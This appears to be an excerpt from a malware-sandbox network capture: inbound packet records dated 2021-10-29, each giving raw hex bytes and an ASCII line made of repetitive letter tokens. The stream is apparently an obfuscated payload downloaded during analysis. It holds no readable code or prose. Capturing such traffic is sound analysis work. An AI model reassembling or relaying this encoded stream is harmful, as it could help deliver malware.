20 4e 43 57 20 4e 56 56 20 56 63 20 4c 56 20 59 43 20 59 72 20 4e 56 4d 20 57 43 20 4e 43 43 20 4e 43 57 20 4e 4e 56 20 56 Data Ascii: cW VrI YC rI YV rI LW VNr NNM NCW NVV MW Yc YN Yr IC WC VrC NCW NNV YV Yr VCr rI IV NNV NNM NCM L NYN rI YC cC NVr WI NNM NCW WN Vc LL YC Yr NVM WC VrL NCW NNV YV Vr NIN Yr Ir NNc NNY NrM NNI YL YC YC rI LW VNY NNM NCW NVV Vc LV YC Yr NVM WC NCC NCW NNV V
2021-10-29 18:50:03 UTC	1304	IN	Data Raw: 56 4e 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 57 4d 20 59 43 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 56 56 20 72 49 20 59 43 20 59 59 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 59 72 20 59 43 20 72 49 20 59 43 20 63 4e 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 59 59 20 4e 4e 56 20 59 43 20 72 49 20 72 57 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 56 20 4e 43 57 20 4e 4e 56 20 59 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 72 4d 20 72 57 20 59 43 20 59 72 20 4d 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 72 49 20 59 43 20 4e 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 Data Ascii: VNc Yr Ir NNr NVc NCW NNV YC NWM YC Yr Ir NNY NNM NCW NNV VV rI YC YY Ir NNr NNM NCW NYr YC rI YC cN Ir NNr NNM NYY NNV YC rI rW Yr Ir NNr NVV NCW NNV YN rI YC Yr Ir NNr NNM NCW NNV rM rW YC Yr ML NNY NNM NCW NNL YC rI YC NI Ir NNr NNc NCW NNV YC rI YC Yr
2021-10-29 18:50:03 UTC	1306	IN	Data Raw: 20 56 72 20 4e 4c 59 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 56 4e 57 20 4e 4e 56 20 59 43 20 59 49 20 57 4c 20 4e 56 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 56 43 4e 20 59 4e 20 72 49 20 59 56 20 59 43 20 4e 56 72 20 4e 72 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 63 20 4e 4c 59 20 59 4e 20 59 72 20 49 56 20 49 49 20 4e 43 56 20 57 4c 20 4e 56 72 20 59 43 20 4e 63 63 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 72 20 4d 49 20 59 63 20 59 59 20 49 72 20 4e 4e 49 20 49 49 20 4d 4c 20 4e 43 56 20 56 56 63 20 4e 43 72 20 59 43 20 59 72 20 49 59 20 57 43 20 56 43 59 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 56 72 20 63 4c 20 59 72 20 49 72 20 4e 4e 56 20 57 4c 20 56 4e 4c 20 4e 4e 56 20 59 43 20 59 49 20 56 63 20 Data Ascii: Vr NLY Yr Ir NVC Vc VNW NNV YC YI WL NVW Ir NNr NVM cW VCN YN rI YV YC NVr NrI NNM NCW NNI Vc NLY YN Yr IV II NCV WL NVr YC Ncc YC Yr Ir NNr NNM NCW NNV Yr MI Yc YY Ir NNI II ML NCV VVc NCr YC Yr IY WC VCY NCW NNV Yc VVr cL Yr Ir NNV WL VNL NNV YC YI Vc
2021-10-29 18:50:03 UTC	1307	IN	Data Raw: 20 49 43 20 57 43 20 4e 72 72 20 4e 43 57 20 4e 4e 56 20 59 56 20 57 59 20 4e 63 56 20 59 59 20 49 72 20 4e 4e 63 20 4e 43 43 20 4e 43 59 20 4c 4e 20 56 72 72 20 72 49 20 59 43 20 63 43 20 49 43 20 57 43 20 56 43 4e 20 4e 43 49 20 4e 4e 56 20 59 56 20 59 72 20 57 4c 20 63 4d 20 49 59 20 4e 4e 72 20 4e 4e 59 20 4d 4e 20 4e 4e 56 20 59 43 20 72 57 20 72 63 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 56 72 20 4e 4e 56 20 72 63 20 56 57 20 59 43 20 59 63 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 4e 49 20 59 43 20 72 56 20 59 72 20 4e 4e 72 20 4e 56 4c 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 4e 63 20 59 43 20 4e 56 72 20 56 43 63 20 4e 4e 63 20 4e 43 57 20 4e 4e 49 20 56 63 20 56 4c 49 20 59 43 20 59 72 20 49 56 20 56 Data Ascii: IC WC Nrr NCW NNV YV WY NcV YY Ir NNc NCC NCY LN Vrr rI YC cC IC WC VCN NCI NNV YV Yr WL cM IY NNr NNY MN NNV YC rW rc Yr Ir NNV NNM NVr NNV rc VW YC Yc Ir NNr NNM NCW NNr YC NNI YC rV Yr NNr NVL NCW NNV YC rI NNc YC NVr VCc NNc NCW NNI Vc VLI YC Yr IV V
2021-10-29 18:50:03 UTC	1308	IN	Data Raw: 72 20 49 56 20 56 57 20 56 56 59 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 43 20 4e 57 4e 20 56 57 20 49 72 20 4e 4e 72 20 4e 4e 57 20 4d 56 20 4e 43 56 20 63 59 20 4e 63 4c 20 59 43 20 59 72 20 49 56 20 56 43 49 20 49 43 20 4e 56 56 20 4e 4e 49 20 4e 72 72 20 56 72 20 4e 57 4e 20 59 72 20 49 72 20 4e 4e 63 20 4e 56 63 20 4e 43 63 20 4e 4e 59 20 57 4c 20 49 57 20 59 4e 20 59 72 20 49 56 20 57 43 20 56 72 57 20 4e 43 57 20 4e 4e 56 20 59 56 20 57 59 20 56 72 49 20 59 72 20 49 72 20 4e 56 43 20 4e 4e 4c 20 63 57 20 56 43 72 20 59 4e 20 72 49 20 59 56 20 72 57 20 59 57 20 56 72 4c 20 4e 4e 63 20 4e 43 57 20 4e 4e 49 20 56 72 20 4e 63 63 20 72 57 20 49 57 20 59 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 56 20 72 63 20 59 56 20 56 63 20 4e 4c 49 20 49 59 20 4e Data Ascii: r IV VW VVY NCW NNV YV rC NWN VW Ir NNr NNW MV NCV cY NcL YC Yr IV VCI IC NVV NNI Nrr Vr NWN Yr Ir NNc NVc NCc NNY WL IW YN Yr IV WC VrW NCW NNV YV WY VrI Yr Ir NVC NNL cW VCr YN rI YV rW YW VrL NNc NCW NNI Vr Ncc rW IW YL NNY NNM NCM WV rc YV Vc NLI IY N
2021-10-29 18:50:03 UTC	1312	IN	Data Raw: 72 20 4e 56 43 20 49 57 20 4e 43 72 20 4e 43 4c 20 4c 4c 20 59 72 20 56 59 20 63 4c 20 4d 43 20 4e 56 56 20 57 4c 20 49 49 20 4e 4e 56 20 59 43 20 59 49 20 4c 4e 20 56 4c 56 20 4e 4c 49 20 4e 56 72 20 4e 43 4c 20 4e 43 4e 20 4e 72 56 20 4c 63 20 59 63 20 59 43 20 59 72 20 4d 57 20 56 57 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 4c 63 20 4c 59 20 72 49 20 4e 4e 43 20 4e 4d 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4c 4c 20 59 59 20 63 57 20 72 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 57 20 59 63 20 4c 4c 20 59 63 20 49 57 20 4e 4c 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 57 20 59 4c 20 4c 49 20 4c 4c 20 63 4e 20 63 63 20 57 4d 20 4e 56 4e 20 4d 43 20 59 4d 20 4c 59 20 59 57 20 4c 4e 20 4e 56 4c 20 63 63 20 57 4d 20 4e 56 43 20 4d Data Ascii: r NVC IW NCr NCL LL Yr VY cL MC NVV WL II NNV YC YI LN VLV NLI NVr NCL NCN NrV Lc Yc YC Yr MW VW NVc NCW NNV Yc VLc LY rI NNC NMc NNM NCW NNV YC LL YY cW rI NNr NNM NCL WW Yc LL Yc IW NLY NNr NNM NCL WW YL LI LL cN cc WM NVN MC YM LY YW LN NVL cc WM NVC M
2021-10-29 18:50:03 UTC	1316	IN	Data Raw: 20 4e 4e 4d 20 4e 43 57 20 4e 4d 57 20 72 49 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 72 49 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 4e 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 72 4c 20 72 49 20 59 72 20 49 72 20 4e 63 4e 20 4e 4e 57 20 4e 43 57 20 4e 4e 56 20 59 63 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 72 49 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 49 43 20 4e 4e 72 20 59 43 20 72 49 20 56 4c 4d 20 59 56 20 49 72 20 4e 4e 72 20 4e 4e 49 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 49 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 43 59 20 4e 4e 56 20 4e 56 4c 20 72 57 20 59 43 20 59 72 20 4e 56 63 20 4e 4e 72 20 4e 4e 4d 20 Data Ascii: NNM NCW NMW rI rI YC YL Ir NNr NNM WI NNV YC rW rI Yr Ir NNr NCN NCW NNV YC VrL rI Yr Ir NcN NNW NCW NNV Yc rI YC Yr Ir NNr NNM NCW NNV YC rI YC rI Ir NNr NNM NIC NNr YC rI VLM YV Ir NNr NNI NCW NNV YC YI YC Yr IY NCY cW NCY NNV NVL rW YC Yr NVc NNr NNM
2021-10-29 18:50:03 UTC	1317	IN	Data Raw: 56 43 20 4e 63 57 20 4e 56 72 20 4e 4e 4d 20 4c 4e 20 4c 56 20 59 4c 20 4c 57 20 49 43 20 4e 4e 4c 20 4e 4e 4c 20 63 57 20 56 56 72 20 59 43 20 72 49 20 59 56 20 4c 43 20 63 63 20 4e 4e 72 20 4e 4e 4d 20 4d 43 20 4e 56 4c 20 59 57 20 57 59 20 63 56 20 59 72 20 49 72 20 4e 56 43 20 49 49 20 56 59 59 20 4e 4d 72 20 59 63 20 59 4d 20 4c 43 20 72 49 20 57 4c 20 56 57 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 4c 63 20 56 4c 63 20 59 4c 20 4e 4e 72 20 4e 4d 56 20 4e 4e 4d 20 4e 43 59 20 57 57 20 59 49 20 4c 49 20 4c 4c 20 63 4c 20 4e 56 4d 20 49 4c 20 4e 43 43 20 4e 43 4e 20 57 4d 20 59 57 20 4e 4d 43 20 4c 4c 20 63 43 20 49 4c 20 4e 4e 56 20 4e 43 43 20 4e 43 4c 20 49 49 20 56 4c 4c 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 4e 43 43 20 4e 4e 4d 20 4e Data Ascii: VC NcW NVr NNM LN LV YL LW IC NNL NNL cW VVr YC rI YV LC cc NNr NNM MC NVL YW WY cV Yr Ir NVC II VYY NMr Yc YM LC rI WL VW NVc NCW NNV Yc VLc VLc YL NNr NMV NNM NCY WW YI LI LL cL NVM IL NCC NCN WM YW NMC LL cC IL NNV NCC NCL II VLL rI YC cC NVr NCC NNM N
2021-10-29 18:50:03 UTC	1322	IN	Data Raw: 56 20 59 63 20 63 4e 20 4d 63 20 72 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 56 63 20 4e 4e 63 20 4d 63 20 72 63 20 59 43 20 59 72 20 57 72 20 57 4d 20 4e 4e 56 20 4e 43 43 20 4c 20 4e 63 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 49 4e 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 57 4c 20 56 43 20 59 43 20 59 72 20 57 72 20 57 4d 20 4e 4e 4c 20 4e 56 72 20 4e 4e 63 20 72 59 20 63 4c 20 4e 57 4e 20 4e 43 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4d 56 20 4e 63 43 20 56 4e 59 20 72 49 20 59 43 20 59 43 20 4e 56 72 20 63 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 63 59 20 49 20 59 43 20 59 72 20 57 72 20 56 57 20 49 43 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 49 20 72 43 20 72 43 20 56 4e 4d 20 72 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 56 4c 20 56 56 72 20 56 59 59 Data Ascii: V Yc cN Mc rC Ir NNr NVM NVc NNc Mc rc YC Yr Wr WM NNV NCC L Nc rI YC cC NVr IN NNM NCW NVV WL VC YC Yr Wr WM NNL NVr NNc rY cL NWN NCI Ir NNr NNc MV NcC VNY rI YC YC NVr cW NNM NCW NVV cY I YC Yr Wr VW IC NCW NNV Yc VI rC rC VNM rC NNM NCW NNL VL VVr VYY
2021-10-29 18:50:03 UTC	1326	IN	Data Raw: 4e 4c 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 63 20 4e 4e 57 20 49 49 20 57 63 20 72 49 20 59 43 20 63 43 20 4d 59 20 4e 43 4e 20 56 72 49 20 59 59 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 56 4c 43 20 4e 4c 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 49 49 20 59 20 72 49 20 59 43 20 63 43 20 4c 57 20 4d 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 56 63 20 56 4d 20 59 43 20 59 72 20 57 72 20 57 4d 20 4e 56 59 20 4e 43 4d 20 4c 20 4e 57 57 20 72 49 20 59 43 20 72 49 20 4d 4e 20 4e 4e 49 20 4e 43 43 20 4e 43 59 20 57 49 20 59 4e 20 56 72 20 56 4e 57 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 4c 4e 20 4e 4e 56 20 59 43 20 59 72 20 4c 59 20 59 43 20 63 4d 20 56 59 59 20 72 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 56 4e 20 4c 63 20 72 4e 20 4e 56 63 20 56 4c 57 20 Data Ascii: NL Yr Ir NNr NCc NNW II Wc rI YC cC MY NCN VrI YY NNV YC rW VL VLC NLC NNr NNM NCY II Y rI YC cC LW Mr NNM NCW NVV Vc VM YC Yr Wr WM NVY NCM L NWW rI YC rI MN NNI NCC NCY WI YN Vr VNW Yr Ir NVC Vc NLN NNV YC Yr LY YC cM VYY rM NCW NNV YN VN Lc rN NVc VLW
2021-10-29 18:50:03 UTC	1330	IN	Data Raw: 20 59 4d 20 59 43 20 4d 43 20 4e 56 72 20 4e 4d 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 63 72 20 4e 4e 57 20 59 63 20 59 72 20 4c 63 20 4e 56 20 4e 43 4d 20 4e 43 57 20 4e 4e 56 20 59 63 20 57 59 20 72 59 20 59 72 20 49 72 20 4e 56 43 20 4d 20 4e 63 20 4e 56 56 20 59 43 20 63 72 20 63 72 20 4e 59 59 20 57 72 20 4e 4e 72 20 59 20 4e 57 20 4e 4e 43 20 59 43 20 72 49 20 59 63 20 4c 43 20 4d 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 49 49 20 4e 4e 20 72 49 20 59 43 20 63 43 20 59 57 20 4e 4c 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 4c 20 63 63 20 4e 72 4c 20 63 43 20 49 72 20 56 20 4d 20 4e 56 72 20 4e 56 4c 20 59 43 20 63 72 20 4d 63 20 72 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 4e 4e 4e 20 59 43 20 72 49 20 59 63 20 4c 43 20 4d 63 20 4e 4e 72 20 Data Ascii: YM YC MC NVr NM NNM NCW NVV cr NNW Yc Yr Lc NV NCM NCW NNV Yc WY rY Yr Ir NVC M Nc NVV YC cr cr NYY Wr NNr Y NW NNC YC rI Yc LC MY NNr NNM NCL II NN rI YC cC YW NLC NNM NCW NNI VL cc NrL cC Ir V M NVr NVL YC cr Mc rC Ir NNr NVM cW NNN YC rI Yc LC Mc NNr
2021-10-29 18:50:03 UTC	1334	IN	Data Raw: 20 56 49 20 72 49 20 59 43 20 59 56 20 72 4d 20 49 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 57 4e 20 57 59 20 4e 57 56 20 59 72 20 49 72 20 4e 56 43 20 56 4e 59 20 49 59 20 56 56 63 20 59 43 20 72 49 20 59 43 20 59 56 20 72 4d 20 4e 43 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 59 4c 20 59 63 20 4e 43 63 20 4e 49 59 20 4e 43 43 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 4e 4e 20 56 4d 20 72 49 20 59 43 20 59 43 20 63 57 20 4e 56 59 20 4e 43 63 20 57 4d 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 4e 4c 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 56 63 20 49 49 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 4e 4e 20 4e 4e 20 4c 72 20 72 49 20 59 43 20 Data Ascii: VI rI YC YV rM Ic NNM NCW NNc WN WY NWV Yr Ir NVC VNY IY VVc YC rI YC YV rM NCV NNM NCW NNc YL Yc NCc NIY NCC NNr NNM NNN NN VM rI YC YC cW NVY NCc WM VYL NCr rI YC YY NNL NcV NLY NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI Vc II Ir NNr NVM NNN NN Lr rI YC
2021-10-29 18:50:03 UTC	1338	IN	Data Raw: 57 4c 20 57 43 20 4e 4e 56 20 59 43 20 59 49 20 63 59 20 4e 72 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 4c 43 20 59 43 20 72 49 20 59 63 20 59 56 20 72 4d 20 57 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 4c 59 20 59 49 20 4c 59 20 59 57 20 4e 56 20 57 57 20 4e 56 4c 20 4e 56 4c 20 56 4c 43 20 4e 43 63 20 4c 4c 20 63 43 20 4c 4c 20 4e 57 72 20 72 56 20 4e 43 43 20 57 57 20 4e 43 72 20 4e 63 72 20 4e 43 72 20 4c 59 20 59 63 20 4d 4d 20 56 56 49 20 72 59 20 72 20 57 4d 20 63 43 20 72 56 20 4e 63 72 20 57 59 20 59 57 20 4e 56 49 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4d 57 20 56 72 20 59 43 20 59 72 20 49 43 20 4d 72 20 56 4c 59 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 43 20 4d 4c 20 59 4d 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4e 4e 4d 20 56 63 20 4e 20 4e 4e Data Ascii: WL WC NNV YC YI cY Nr Ir NNr NVM cW LC YC rI Yc YV rM WI NNM NCW NNc LY YI LY YW NV WW NVL NVL VLC NCc LL cC LL NWr rV NCC WW NCr Ncr NCr LY Yc MM VVI rY r WM cC rV Ncr WY YW NVI NNM NCW NVV MW Vr YC Yr IC Mr VLY NCW NNV YC YC ML YM Ir NNr NNL NNM Vc N NN
2021-10-29 18:50:03 UTC	1342	IN	Data Raw: 20 56 63 20 49 56 20 59 43 20 59 72 20 57 72 20 49 49 20 57 57 20 4e 4e 43 20 4e 43 72 20 56 43 72 20 72 57 20 56 72 20 59 72 20 49 72 20 4e 43 59 20 63 57 20 4e 43 72 20 4e 4e 56 20 63 4d 20 72 49 20 59 43 20 59 72 20 4e 4e 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4e 4e 59 20 57 4c 20 4e 59 4c 20 59 4e 20 59 72 20 49 56 20 4e 43 4e 20 56 72 49 20 59 4c 20 4e 4e 56 20 59 43 20 72 57 20 56 4c 20 4c 56 20 4c 49 20 4e 4d 56 20 4e 4e 72 20 4e 43 57 20 43 20 4e 72 72 20 4c 57 20 57 4c 20 4e 56 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 4c 20 4c 20 59 4e 20 72 57 20 59 43 20 63 43 20 49 56 20 4e 43 43 20 56 4c 57 20 4e 43 4d 20 4e 43 4c 20 4e 63 49 20 56 72 20 49 4e 20 59 72 20 49 72 20 4e 56 43 20 57 4c 20 4e 4e 4e 20 4e 4e 4c 20 59 43 20 59 49 20 63 59 20 Data Ascii: Vc IV YC Yr Wr II WW NNC NCr VCr rW Vr Yr Ir NCY cW NCr NNV cM rI YC Yr NNN NNr NNM NVr NNY WL NYL YN Yr IV NCN VrI YL NNV YC rW VL LV LI NMV NNr NCW C Nrr LW WL NVC Ir NNr NVM NCL L YN rW YC cC IV NCC VLW NCM NCL NcI Vr IN Yr Ir NVC WL NNN NNL YC YI cY
2021-10-29 18:50:03 UTC	1346	IN	Data Raw: 4e 63 20 4d 43 20 4e 4e 56 20 4e 4c 57 20 4e 56 43 20 63 4d 20 59 43 20 72 49 20 72 4e 20 63 56 20 4e 56 4d 20 59 57 20 4e 4e 20 4e 56 4c 20 4e 4e 4c 20 59 43 20 59 56 20 56 4c 20 56 4d 20 63 4d 20 49 72 20 4e 4e 20 4e 56 4e 20 4e 4e 4c 20 59 43 20 59 56 20 56 43 72 20 72 49 20 4d 56 20 4e 4e 56 20 4e 4e 4d 20 4e 43 4d 20 4c 20 72 4e 20 72 57 20 59 43 20 63 43 20 4e 4e 4c 20 56 72 56 20 57 57 20 4e 43 49 20 4e 4e 56 20 59 72 20 56 72 20 72 59 20 59 72 20 49 72 20 49 57 20 49 43 20 63 72 20 4e 56 72 20 56 43 20 4c 72 20 72 49 20 56 43 43 20 63 59 20 63 59 20 4e 4e 4d 20 4e 43 57 20 4e 43 4d 20 59 49 20 56 4d 20 4c 63 20 72 49 20 4e 4d 43 20 4e 4e 63 20 4e 43 57 20 4e 4e 4e 20 4e 4e 56 20 59 56 20 63 4d 20 72 4d 20 59 59 20 49 72 20 4e 56 43 20 57 4c 20 4d Data Ascii: Nc MC NNV NLW NVC cM YC rI rN cV NVM YW NN NVL NNL YC YV VL VM cM Ir NN NVN NNL YC YV VCr rI MV NNV NNM NCM L rN rW YC cC NNL VrV WW NCI NNV Yr Vr rY Yr Ir IW IC cr NVr VC Lr rI VCC cY cY NNM NCW NCM YI VM Lc rI NMC NNc NCW NNN NNV YV cM rM YY Ir NVC WL M
2021-10-29 18:50:03 UTC	1349	IN	Data Raw: 4e 72 20 4e 56 4d 20 56 43 4d 20 49 59 20 4c 4d 20 4c 57 20 4c 49 20 4c 43 20 56 4c 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 56 4e 43 20 56 4c 20 72 43 20 4c 4d 20 4c 72 20 4e 56 72 20 56 43 63 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4e 72 72 20 56 4e 20 72 4c 20 4c 56 20 63 72 20 57 43 20 56 43 4e 20 4e 43 57 20 4e 4e 56 20 59 63 20 4e 72 63 20 56 63 20 4e 4c 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 63 57 20 72 57 20 59 4e 20 72 49 20 59 63 20 4e 49 56 20 4d 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 59 20 4e 72 20 72 4d 20 72 57 20 59 43 20 59 43 20 72 4d 20 72 49 20 4e 4e 63 20 4e 43 57 20 4e 56 56 20 4d 63 20 72 59 20 59 4e 20 59 72 20 49 43 20 4e 56 56 20 57 57 20 4e 56 4c 20 4c 20 4e 4e 4c 20 72 57 20 59 43 20 63 43 20 63 63 20 4e 43 43 20 63 20 72 63 20 4e Data Ascii: Nr NVM VCM IY LM LW LI LC VLV NNr NNM NCL VNC VL rC LM Lr NVr VCc NNM NCW NVV Nrr VN rL LV cr WC VCN NCW NNV Yc Nrc Vc NLW Ir NNr NVM cW rW YN rI Yc NIV ML NNY NNM NCY Nr rM rW YC YC rM rI NNc NCW NVV Mc rY YN Yr IC NVV WW NVL L NNL rW YC cC cc NCC c rc N
2021-10-29 18:50:03 UTC	1354	IN	Data Raw: 20 4d 4d 20 72 49 20 72 57 20 63 43 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 4e 4e 20 4e 4e 56 20 56 49 20 72 49 20 4e 43 49 20 4e 49 63 20 49 72 20 4e 56 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 59 43 20 59 43 20 4e 4d 20 49 72 20 4c 20 56 4c 4d 20 4e 43 57 20 4e 56 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 63 20 4e 4e 72 20 49 59 20 4e 43 57 20 56 72 72 20 4e 59 43 20 72 49 20 59 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 49 20 4e 59 56 20 4e 4c 72 20 49 72 20 4e 4e 4c 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 72 4c 20 56 20 59 4e 20 49 72 20 4e 63 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 56 4e 20 72 49 20 59 43 20 4c 57 20 4c 57 20 56 4e 63 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 59 63 20 63 Data Ascii: MM rI rW cC Ir NNr NNc NNN NNV VI rI NCI NIc Ir NVC NNM NCW NNV YC YC YC NM Ir L VLM NCW NVV YC rI YC Yr Ic NNr IY NCW Vrr NYC rI Yc Yr Ir NNr NNM NCW NNV YV rI NYV NLr Ir NNL NVM NCW NNV YN rL V YN Ir NcY NNM NCW NNV NVN rI YC LW LW VNc NNM NCW NVV Yc c
2021-10-29 18:50:03 UTC	1358	IN	Data Raw: 4e 4e 72 20 59 43 20 72 49 20 59 43 20 4e 59 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 63 72 20 4e 4e 4c 20 59 43 20 72 49 20 49 72 20 59 59 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 56 20 72 49 20 59 43 20 59 72 20 59 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 56 20 59 4e 20 72 49 20 59 43 20 59 4c 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4e 4e 56 20 59 43 20 72 57 20 72 4e 20 63 20 49 4e 20 4e 4e 72 20 56 72 43 20 4e 4e 4e 20 4e 4e 56 20 59 43 20 4e 56 4d 20 59 43 20 59 72 20 63 57 20 4e 20 56 4e 43 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 49 20 4e 49 20 4e 49 4d 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 56 72 20 72 56 20 59 43 20 72 49 20 59 4e Data Ascii: NNr YC rI YC NY Ir NNr NNM cr NNL YC rI Ir YY Ir NNr NVM NCW NNV YC rI YC Yr Ir NNr NNM NCW NNV YV rI YC Yr Yc NNY NNM NCW V YN rI YC YL Ir NNr NNM NCL NNV YC rW rN c IN NNr VrC NNN NNV YC NVM YC Yr cW N VNC NCW NNV Yc YI NI NIM Ir NNr NNM VVr rV YC rI YN
2021-10-29 18:50:03 UTC	1362	IN	Data Raw: 43 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4c 63 20 4e 4e 56 20 4e 4d 49 20 56 72 57 20 59 43 20 63 43 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 4e 72 20 59 43 20 4e 63 59 20 4e 56 57 20 4e 4e 72 20 4e 56 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 56 20 4e 4e 72 20 4e 4d 72 20 4e 72 43 20 4e 4e 56 20 72 57 20 59 49 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 43 72 20 4e 4e 56 20 4e 43 49 20 72 57 20 59 43 20 59 72 20 72 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4c 20 4e 72 57 20 72 49 20 59 43 20 63 43 20 57 72 20 4e 43 57 20 4d 43 20 56 56 72 20 72 56 20 59 43 20 72 49 20 59 4e 20 4e 57 20 4e 4c 56 20 4e 63 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 63 20 4d 20 59 43 20 59 72 20 57 72 Data Ascii: C Yr Ir NNV NNM Lc NNV NMI VrW YC cC Ir NNr NNM NCW NNr YC NNr YC NcY NVW NNr NVM NCW NNV YC rI YC Yr IV NNr NMr NrC NNV rW YI YC Yr IY NCY cW NCr NNV NCI rW YC Yr r NNr NNM NVr L NrW rI YC cC Wr NCW MC VVr rV YC rI YN NW NLV NcY NNM NCW NNc Vc M YC Yr Wr
